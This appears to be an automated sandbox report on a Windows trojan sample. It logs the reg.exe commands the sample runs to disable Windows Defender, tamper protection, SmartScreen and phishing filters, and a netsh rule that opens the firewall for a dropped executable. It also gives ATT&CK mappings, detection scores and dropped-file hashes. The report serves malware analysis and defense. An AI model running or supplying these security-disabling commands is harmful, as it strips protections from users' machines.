Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe

Code function: 7_2_00007FF6868580F6 SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,SetSecurityDescriptorDacl,SetSecurityDescriptorSacl,GetLastError,MakeSelfRelativeSD,MakeSelfRelativeSD,GetLastError,_invalid_parameter_noinfo_noreturn,

7_2_00007FF6868580F6

Source: PowerRun64.exe.0.dr

Binary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe

Code function: 7_2_00007FF68687BD40 cpuid

7_2_00007FF68687BD40

Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	7_2_00007FF686876C40
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: EnumSystemLocalesW,	7_2_00007FF68687791C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: GetLocaleInfoW,	7_2_00007FF686877548
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	7_2_00007FF686877674
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: GetLocaleInfoW,	7_2_00007FF686877340
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_00007FF686877498
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: EnumSystemLocalesW,	7_2_00007FF686876F8C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	7_2_00007FF6868770F4
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: EnumSystemLocalesW,	7_2_00007FF68687705C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: try_get_function,GetLocaleInfoW,	7_2_00007FF686877EB0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	11_2_00007FF686876C40
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: EnumSystemLocalesW,	11_2_00007FF68687791C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: GetLocaleInfoW,	11_2_00007FF686877548
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	11_2_00007FF686877674
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: GetLocaleInfoW,	11_2_00007FF686877340
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	11_2_00007FF686877498
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: EnumSystemLocalesW,	11_2_00007FF686876F8C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	11_2_00007FF6868770F4
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: EnumSystemLocalesW,	11_2_00007FF68687705C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: try_get_function,GetLocaleInfoW,	11_2_00007FF686877EB0

Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe

Code function: 7_2_00007FF68683D304 GetSystemTimeAsFileTime,GetCurrentThreadId,GetUserNameExW,GetLastError,GetUserNameExW,GetLastError,LeaveCriticalSection,LeaveCriticalSection,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

7_2_00007FF68683D304

Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe

Code function: 7_2_00007FF68685F3C0 LookupAccountNameW,GetLastError,GetLastError,LookupAccountNameW,GetLastError,IsValidSid,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,

7_2_00007FF68685F3C0

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe

0_2_00403532

Lowering of HIPS / PFW / Operating System Security Settings

Disable Microsoft Windows Malicious Software Removal Tool Heartbeat Telemetry

Source: C:\Windows\SysWOW64\reg.exe

Registry value created: SpyNetReportingLocation 0

Jump to behavior

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions	Registry value created: DisableAutoExclusions 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine	Registry value created: MpEnablePus 0

Disables Windows Defender Tamper protection

Source: C:\Windows\SysWOW64\reg.exe

Registry value created: TamperProtectionSource 2

Jump to behavior

Disables the Smart Screen filter

Source: C:\Windows\SysWOW64\reg.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer SmartScreenEnabled Off

Disables the phising filter of Microsoft Edge

Source: C:\Windows\SysWOW64\reg.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter PreventOverride

Jump to behavior

Modifies the windows firewall

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,private

Uses netsh to modify the Windows network and firewall settings

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	8 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	2 Browser Session Hijacking	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	Logon Script (Windows)	1 Access Token Manipulation	11 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Clipboard Data	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	12 Process Injection	1 Software Packing	NTDS	44 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	121 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Bypass User Account Control	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	12 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
4hIPvzV6a2.exe	37%	ReversingLabs	Win32.Trojan.Generic
4hIPvzV6a2.exe	44%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\PowerRun64.exe	21%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\PowerRun64.exe	29%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dll	1%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\nsExec.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\nsExec.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe	5%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\win_version_csharp.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\win_version_csharp.exe	1%	Virustotal	Browse

Source	Detection	Scanner	Label	Link
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
https://helgeklein.com	0%	Avira URL Cloud	safe
http://www.wolfpackheights.click	0%	Avira URL Cloud	safe
https://helgeklein.com.	0%	Avira URL Cloud	safe
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe	0%	Avira URL Cloud	safe
https://helgeklein.com	0%	Virustotal		Browse
https://helgeklein.com.	0%	Virustotal		Browse
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe	0%	Virustotal		Browse

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_ErrorError	4hIPvzV6a2.exe	false	URL Reputation: safe	unknown
http://www.wolfpackheights.click	4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://helgeklein.com.	SetACL64.exe, SetACL64.exe, 0000000B.00000000.1717859358.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.1721888833.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.1720704714.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.1727313975.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.1724751367.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000002.1728519189.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000000.1727792891.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://helgeklein.com	SetACL64.exe, SetACL64.exe, 0000000B.00000000.1717859358.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.1721888833.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.1720704714.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.1727313975.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.1724751367.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000002.1728519189.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000000.1727792891.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe	SetACL64.exe, SetACL64.exe, 0000000B.00000000.1717859358.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.1721888833.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.1720704714.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.1727313975.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.1724751367.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000002.1728519189.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000000.1727792891.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1515274
Start date and time:	2024-09-22 07:11:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	48
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	4hIPvzV6a2.exe renamed because original name is a hash value
Original Sample Name:	99a7d3f6669bc38e1fe1ca11e9085516.exe
Detection:	MAL
Classification:	mal96.phis.evad.winEXE@154/10@0/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 123 Number of non-executed functions: 161
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Excluded IPs from analysis (whitelisted): 4.175.87.197, 93.184.221.240, 13.85.23.206
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, www.wolfpackheights.click, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\PowerRun64.exe	3Dut8dFCwD.exe	Get hash	malicious	Unknown	Browse
	Ms63nDrOBa.exe	Get hash	malicious	Unknown	Browse
	Ptmhbplhxb.exe	Get hash	malicious	Unknown	Browse
	P196hUN2fw.exe	Get hash	malicious	Unknown	Browse
	e4.exe	Get hash	malicious	RedLine	Browse
	2dOeahdsto.exe	Get hash	malicious	Xmrig	Browse
	bQQHP9ciRL.exe	Get hash	malicious	Xmrig	Browse
	DllHost.exe	Get hash	malicious	Xmrig	Browse
	Fza7TPh6Z7.exe	Get hash	malicious	Unknown	Browse
	SAlxtNmHFR.exe	Get hash	malicious	RedLine Xmrig	Browse
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dll	update_231101.exe	Get hash	malicious	Unknown	Browse
	update_231101.exe	Get hash	malicious	Unknown	Browse
	sdbmzc_unpack.exe	Get hash	malicious	Unknown	Browse
	sdbmzc_unpack.exe	Get hash	malicious	Unknown	Browse
	sdbmzc.exe	Get hash	malicious	Unknown	Browse
	sdbmzc.exe	Get hash	malicious	Unknown	Browse
	sdbmzc.exe	Get hash	malicious	Unknown	Browse
	sdbmzc.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\PowerRun64.exe

Download File

Process:	C:\Users\user\Desktop\4hIPvzV6a2.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	945944
Entropy (8bit):	6.654096172451499
Encrypted:	false
SSDEEP:	24576:X2DW/xbMX2YIbxQsu3/PNLoQ+HyS2I4jRk:X2EgXoQsW/PNUQWnX4jRk
MD5:	EFE5769E37BA37CF4607CB9918639932
SHA1:	F24CA204AF2237A714E8B41D54043DA7BBE5393B
SHA-256:	5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
SHA-512:	33794A567C3E16582DA3C2AC8253B3E61DF19C255985277C5A63A84A673AC64899E34E3B1EBB79E027F13D66A0B8800884CDD4D646C7A0ABE7967B6316639CF1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21% Antivirus: Virustotal, Detection: 29%, Browse
Joe Sandbox View:	Filename: 3Dut8dFCwD.exe, Detection: malicious, Browse Filename: Ms63nDrOBa.exe, Detection: malicious, Browse Filename: Ptmhbplhxb.exe, Detection: malicious, Browse Filename: P196hUN2fw.exe, Detection: malicious, Browse Filename: e4.exe, Detection: malicious, Browse Filename: 2dOeahdsto.exe, Detection: malicious, Browse Filename: bQQHP9ciRL.exe, Detection: malicious, Browse Filename: DllHost.exe, Detection: malicious, Browse Filename: Fza7TPh6Z7.exe, Detection: malicious, Browse Filename: SAlxtNmHFR.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.@............yGI......p\.}....pJ......p[.............._.....................pP......ZJ......ZK.......H......pN.....Rich............................PE..d...(..K..........#......\...*......\|..........@.....................................N........@...............@.................................T................j...Q.. ............................................................p...............................text....Z.......\.................. ..`.rdata...V...p...X...`..............@..@.data............v..................@....pdata...j.......l..................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\Ryvnxbtsbt.ico

Download File

Process:	C:\Users\user\Desktop\4hIPvzV6a2.exe
File Type:	MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
Category:	dropped
Size (bytes):	15086
Entropy (8bit):	5.53072581096406
Encrypted:	false
SSDEEP:	192:Jci1/zqaRKheZqCHXbIixCaijSFtQeEA3eeYVRbEZbJ24Jd:Jci1/VOBCLTijSFieEQeeeRbEZbJ5d
MD5:	D365FDC90B0B365D53DF324B2AD2B505
SHA1:	167BBF5DA119B68EF6DE5C695F17EAD294D4BE31
SHA-256:	59FB7DAC3042D08387273B4834E039C5E65ACEABD2496901E44C2F35C165B3E2
SHA-512:	8D199278730022FF0ACE3F2745EA2C4D03A1EEBF4228FBE3DE6263F4EB6EF90097D9C945E2BE3C41756C8596B0D14D595032ED177AF79425CC6AB52DBF63E6D5
Malicious:	false
Preview:	............ .h...6... .... .........00.... ..%..F...(....... ..... ..........................................................................................5 ..?.4.D$4.@%4.>!4............................................*v\|.1...y.........L........................................................k....................................................Y......_...............................................................................................................................................................................................................................................................................................q...u...t...t...x......................................................................................................M..J..G............._..Q..G..G...=...J..................U...T.z.u.t.v.o.x.x.r..._..8~.8v.=v.Pv..~v...v...v...r.........ZB..x.z...O.......................................................

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dll

Download File

Process:	C:\Users\user\Desktop\4hIPvzV6a2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	5.021119508727912
Encrypted:	false
SSDEEP:	96:NdekHUj5z13cPopei+Ml9PNDFbS7xg+TScrQ5:NdeuU9xcPopr+M9FbSS+TSE
MD5:	E5786E8703D651BC8BD4BFECF46D3844
SHA1:	FEE5AA4B325DEECBF69CCB6EADD89BD5AE59723F
SHA-256:	D115BCE0A787B4F895E700EFE943695C8F1087782807D91D831F6015B0F98774
SHA-512:	D14AD43A01DB19428CD8CCD2FE101750860933409B5BE2EB85A3E400EFCD37B1B6425CE84E87A7FE46ECABC7B91C4B450259E624C178B86E194BA7DA97957BA3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Joe Sandbox View:	Filename: update_231101.exe, Detection: malicious, Browse Filename: update_231101.exe, Detection: malicious, Browse Filename: sdbmzc_unpack.exe, Detection: malicious, Browse Filename: sdbmzc_unpack.exe, Detection: malicious, Browse Filename: sdbmzc.exe, Detection: malicious, Browse Filename: sdbmzc.exe, Detection: malicious, Browse Filename: sdbmzc.exe, Detection: malicious, Browse Filename: sdbmzc.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................t........................................Rich....................PE..L...rb.R...........!.............`..@v...p................................................@.........................`...D...X...........X...........................................................................................................UPX0.....`..............................UPX1.........p......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe

Download File

Process:	C:\Users\user\Desktop\4hIPvzV6a2.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	616312
Entropy (8bit):	6.302197712270286
Encrypted:	false
SSDEEP:	12288:3G2NBTh+l8gAqAbdsuEa3nZGSebY7o937bfJ9Ud:3xNBTYlaLdaynZGBc7orbJ9Ud
MD5:	1FB64FF73938F4A04E97E5E7BF3D618C
SHA1:	AA0F7DB484D0C580533DEC0E9964A59588C3632B
SHA-256:	4EFC87B7E585FCBE4EAED656D3DBADAEC88BECA7F92CA7F0089583B428A6B221
SHA-512:	DA6007847FFE724BD0B0ABE000B0DD5596E2146F4C52C8FE541A2BF5F5F2F5893DCCD53EF315206F46A9285DDBD766010B226873038CCAC7981192D8C9937ECE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................}.........@..........................................................g...........Rich....................PE..d.....`..........".................x$.........@..........................................`.............................................................x.... ..P@...J..x...............p.......................(.......8...............8............................text............................... ..`.rdata... ......."..................@..@.data....8..........................@....pdata..P@... ...B..................@..@_RDATA.......p.......$..............@..@.rsrc...x............&..............@..@.reloc...............<..............@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn.bat

Download File

Process:	C:\Users\user\Desktop\4hIPvzV6a2.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1012
Entropy (8bit):	4.927481769041986
Encrypted:	false
